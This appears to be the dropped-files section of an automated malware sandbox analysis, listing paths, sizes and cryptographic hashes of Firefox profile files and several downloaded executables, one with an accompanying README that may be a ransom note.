MD5168dbfe1a1de150ace50dc0e6d584a16
SHA13934767503c022e96d72a332b885ee432040b556
SHA256a755e70fa8e5cbbd69c94a555a1086e9ef69871e69bd6360cd703acad46f3616
SHA512715dcda5085ca4848de67f2b031e60aa9f76b6e3d696bb7818ae7d2fce02d8d6acd0c2e273d12ebd06fcf54871053530855da0f570cfa269ce9415e8aea13b58
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\76ebbd5b-640e-442c-8581-1f0ae9f6a23b
Filesize886B
MD514856bb13c7aa2dd8c2c4b231e54c3ce
SHA11d12671c90d475708a10f65011fd9aff8a7cdc24
SHA256aa18094595d2a67a2ac0b6724cd50db35ed062119ab125db01509aa48b56cf48
SHA512f1633efd0323a7f96550843ea96ceb3af770b35f2a57d97ffb1d18ae3aa79c1c6e0cb90f470df7329c753a5840eee6ecc6dd659262e575644039914b5bdeed4f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\7a9b962d-3cc2-4a4a-bf49-aaf70f938189
Filesize883B
MD5c52e732f3584019d6c2e40713b55499d
SHA1ed21955478c64fef773270704849d165e6a1b2d0
SHA2562fa9ac1b9c9c8beb47058e612bc828ba1093897659a68a4df04af694ab46216b
SHA5120a213614f741840929767a559d51dc03f6b7ebd238f1c175aea9047bfcaa1efba62b8356f7bc84599767309144961c2c2dbc09db2470ea90d8162a95ebca761d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\7da26bf8-2c75-4e5f-9c43-76c1c5332619
Filesize235B
MD59c9ee735e976b70b11b5052883f80e78
SHA17956fca2cd8340489fa1279f917710541bbe3ab7
SHA25681bb50205586385721c7496e9d5007972e726292aa64212e50b13d3e11231902
SHA512990c40032be34510dd4e7f31e496b7ee3c60010715520d8b3880509a565fbcc013a97c3cddc764db2835ca4f615f172dcc41adeb423288a9f10352a1ad2d5f27
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\ce5bfbb3-75a4-4225-a634-04beb4c7a324
Filesize235B
MD50369441e9a2d9e3fc6e1d0f9a6d6a716
SHA198c17ccd2e27ab493c5f6bb027e81e92cd33dc7b
SHA256e98f7d45c0ba92b683ea1e342396b01550531950f3b189d83523ddf2d34b735f
SHA512f258181040f4dc825cd23a280fe65c3ab71740e7eeea2004f00eb2814596f81c9d19f824b2329e3bb90381ef890f7b004d4951703e307931af4d32dfe4afbb1e
-
Filesize
6KB
MD5b9485aad1455a99bf8ef9c2259ebef9b
SHA1c1ebbeed84e969db0652d4521d0eb2d4edc3b41e
SHA2560baa4438229d7505c3bc95664fd9f2796ada53cabcf37421b1d31179b1185390
SHA512a10e2009647a11f3af4766db51359db018dcec3fd8069d1946ed212c3b661b093b71a774015b84b12a22f6f6182a0fc1bf23d4531ef313cd97a9138f08f6f7ab
-
Filesize
6KB
MD5485b014f1b16f695a0ea33ef9655a342
SHA173a439f8144ce40fbd8b8d3a486560e843d70018
SHA256bd902c8438cb6992a7424b4e5b81cfcdab16dbb52a73cad43b4b88dc2343267f
SHA5127b5c2c185c63bd6c7d0cb78c1563499604b9dfdb42f112e7cc3e38a6156e8872358de45067be324ae3eef19c1307fd5778a2b28217917d2c43426b693d3cf062
-
Filesize
6KB
MD544435cd745f11c9006e3f9802711960a
SHA1f2a6324886b44ce7afbf1c25dec042685ae3c91a
SHA256965a57a82458571c95a084359603a477e04e1aae7308fbbdfa9360647c857250
SHA51253b5d6b0bbd6ca840657f5c505c1ac30246dbba88ae9537feaf9d71760c50f07c874cc82fcd563c848713473a9f0f7a9f03566e013f02128e0446aceca32da9b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\sessionCheckpoints.json.tmp
Filesize288B
MD5362985746d24dbb2b166089f30cd1bb7
SHA16520fc33381879a120165ede6a0f8aadf9013d3b
SHA256b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA5120e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61
-
Filesize
1KB
MD53cc2d08244a1ead086546c489687293b
SHA1125f58a55ab503e5c3a5b356a9ccf7c172594f75
SHA256987d8d5bbd17af1eb51e1b0907b1c823e79a135212a105ff06943d7406ed4561
SHA5124f7f40aa4fae5d29c7c91c798e69b0a49f518d73011eaa5e2c72efc67e32a687cd921c5998f3acace6fdd3de2e4a2470d56ada55e67f24d6d35d4ccad619e3db
-
Filesize
2KB
MD581f3e3bb7af0f37cb25c6ab65cefc93e
SHA1192744a605d6daf9a3071eb281a66ffae80ccfe5
SHA256dca35bbc1f8f0cdae39a7bce5308f734075014733e7d836c124e04688100fc14
SHA5121015d5a801708a032353b12ba336f2a5bb58232e580a5d14b2054b0ce1a909ba489b3ad35242e3dffdd64d0aebe74e745fc289ecf2614a0269ad08d02cc3a8f6
-
Filesize
344B
MD501f9546a63a8ed98fe2a82337c7f83a8
SHA12ad88af2e71d178f4d4365eacf34ff2fb1b3a754
SHA25681cb5d9a4c8ecbbedb2e363e2ae175dd7160359138c8fd1e32c0e05d8f3a689d
SHA512b9eb550a014781abb8f688aec4c37a9bb7dc721820047eb3f732333aa424c208d9529494c4178c074a0aa342116c3f553ea76bf11745a0e9dcc0aae9b04d34de
-
Filesize
352B
MD5b023ea7e46ed17e1b9cbad3a5f944db2
SHA1700da850404b343d7873cb1ec60ad5afabcf5469
SHA256c148c6f679d12a3b62ad158cf1406f8fa3ad69ba7463095985a7170aca288ec0
SHA5122eca371570a99ff7d6788dd032f9fdff63104ab2dd0469129fc2cf2331e006225c847f0d598c6d52fc5de9f335c4c2e58aaf62e89d337fa17165720153e585e4
-
Filesize
2.0MB
MD541f69e578bddf83103c226f2f926cf61
SHA1dd8f15830bd3b987b0321edf4d482e82d118115a
SHA256faface504dbc04cbebbcfc6b7c0e818e735573f20d2c23c7e9acde27f7448a68
SHA51227c1d89093b41b0fdf7b7c31d8a43f10754157dccf9f1b3e237c50a8304069946b97f32add31350d434f84c89ab1e7366f2edfca6d6ac682668fb5169dc59351
-
Filesize
2.0MB
MD55b11b8eb4dfccaabb3de8d44129f1681
SHA12ac25540c6ca42b77110540572c00c38310fdb78
SHA256869d12cc404e9c241f0d6eaa44ebc4e96f8a5d304ef166df76f8273ea53a9919
SHA512693970571925d0f12b92ea15af14ebc3f8d0c4bbeddb8eef3db9b7c4d4d2875c0575b88bcea2d15faa2f8d825220704c6b58b0286e75659e30a12e9100fc5592
-
C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe
Filesize5.2MB
MD561d7585b5702d195bc35e0be2f75915c
SHA1ff96db4b937971ca2d60e785ff9f706a50e51de4
SHA25666dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd
SHA5122320332df628f52af0c07f7e783f02c30e02b193b252c88adada87036fa923d0596f7d6024b4df21cda381d12d1e3aa3892e3ee3e3ca3645edd42b752a41cf72
-
C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\README-7ILxnOHKLf.md
Filesize1KB
MD5fd4aed3d9c81fc905b1d7cada84d3dd7
SHA14194a6067ca7173f09adcd93641f8c68fd32b32f
SHA256356409898f3a8f3ad81f818a446f1bc42c4181e432743bafd890a206c184cf83
SHA512304b2c16363c8584ae9a2154cb85c726d7d5c37834c179465e72b1792c5d23816289661c92f463053cc9e1f09d9476b4622dcddf2a20ad464320e2149d947611
-
Filesize
363KB
MD5a0799727a276e582beb80c84ad0614a2
SHA1aa9c882aad352534b2bcfd6109c21f75773eb0ff
SHA25699ce27923235a7b3161085f6cc457c3ffd1e6d35beed521d456dbff3958cdc2e
SHA512d9b9cf823ce8dd49b52cd50fa74e84046abeb5e4c62b17ad5995cbcbf12ff8c8f8e6d49d77df34e517e646ab4e70adbca37d892674d22c0d246db0ddf3a092df
-
C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
Filesize499KB
MD5d7d28006e0679b1f2ea0a87ba94f4af0
SHA1675f7b9185ccc3241650ff2fd96f5e1a0bbf63ee
SHA256e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3
SHA512b3f9257825850e4f2920d05f45eece26323d81d06a761fa2e5b2d154535d45f996a316e238f2d29fb82081a133dfd5ad304835317e65fa72f9fc2e1acbfce03a
-
Filesize
529KB
MD5afb68f760886fec51f867939404095ae
SHA18c537a5bd447a5f8543072d6a957c3c58599ce3b
SHA256daee7f1a8063c726d29f136f4491914ba2d9bb75764a42acaf619e98cf65ed37
SHA512f28ca2aba964c1bda7a950fbb7b64616f869e80e8f897e10b842b80873ef08337a69992e4efbc4a67ecae567d303b76efb3cf0b6d4d366a4e43cef453e3852fd
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe
Filesize1.2MB
MD5aeb06e5cdd5da2bc5259516fb738ac78
SHA1012e54cfcb203e6250f7a086ff2fabb58b0f490f
SHA256eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac
SHA51284f7940590b8ba1ac973917fe3b6dbf367bc8203a261848704fd7cbfb44640b8bd1c0c7bf054159cb1543ec10a4fa96e56be72a8c6a16bea63bec77fe79ad874
-
Filesize
1KB
MD5e44cd015c009e47aab9b1b11e1fc4936
SHA1afec3d12392b51918c1c42b5aed1625dae007ac3
SHA2568cfeb845d5738b90bcb227b6298dde6114f1cb0042f7c596f6a3d599a2621b95
SHA51253e40588c2dd6b3d76752496ed74a55d173571e9794ffd88e78c291dcaa39d955e8046d9946478cec92c7ab41e12ea4a8cae589a61219b85986d4723c26e5522
-
Filesize
1KB
MD5ee002cb9e51bb8dfa89640a406a1090a
SHA149ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA2563dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c
-
Filesize
652B
MD5a8adcb40baba1948050ca70163568a46
SHA11673adfc1d06b156cab023e99bdcbad992084849
SHA2566a2c3ebcb337047ac001492a5e21e033b845b1e311b8af43aa6c6f6f99a0ccac
SHA51296841ef7d7fa522b4350fc9f2321b58779a8f55340891064cf48afff286fce7ba919481e7a9bccf8b86c2e18c72016f8fe743b37f29070969c81fd5aac52e660
-
Filesize
5KB
MD5fc2e5c90a6cb21475ea3d4254457d366
SHA168f9e628a26eb033f1ee5b7e38d440cfd598c85d
SHA25658fcc3cfb1e17e21401e2a4b2452a6e5b8a47163008b54fdcdcc8cadff7e5c77
SHA512c54b9ce28fa71d7e3629cdd74ac9f23cba873506f1b5825acc2aa407414ed603af4c846dcf388c579f8324e3538e63b26f90421ea9d7fcdd3b277c21bad1a5b6
-
Filesize
356B
MD5386696282abaf1a888019a2cb61b06be
SHA18f15fb038b3212c4a1a6154dae6fd9ca9ed92720
SHA25664eabe45b681fe7ba1e6dbbdbe942b7351bc0cbd6995dabdf7c76b41e4755d08
SHA5125147f04c1d95e09d47236eeb4049e23cbdfe00142c0cd547d20cc8c29076a4f6c468513cd21df304ae14139604fd565ea08b85989a98825668b4962e89e819a5
-
Filesize
652B
MD5429b2878f0d9bd144950302f2ec9329e
SHA1155c5dcf5de6a892659c0f441bfec8421c6fe257
SHA2564bb3bf6e5118f4f224e5e1215197ebd75245a566168ef1b7dedd6d609ec68bbd
SHA5128ac7bb5c8945121e3450f5c72ceb3862e71702dc461610173e9e891cdd2206a13470dbff4c2d429ca86cd5110991416df35e627f2feeec994416d1b21cfb4b38
-
Filesize
791B
MD53880de647b10555a534f34d5071fe461
SHA138b108ee6ea0f177b5dd52343e2ed74ca6134ca1
SHA256f73390c091cd7e45dac07c22b26bf667054eacda31119513505390529744e15e
SHA5122bf0a33982ade10ad49b368d313866677bca13074cd988e193b54ab0e1f507116d8218603b62b4e0561f481e8e7e72bdcda31259894552f1e3677627c12a9969
-
Filesize
356B
MD537d454662688f9555f96ffd9fef2ec80
SHA18045290b50766019b6695885900e2889a78f0306
SHA256cf1d33723723b6574cf42e76889dda48f8fd15d2e845046dafd289cec9311bde
SHA512ba8cfd67654d3f5991f55793a6928e2bc4ac5c37e10d48bc71f413874d22219b04ef0a9ed062948fe17792eeea7be7cd6400fc5becfa1800e672858f73ef2880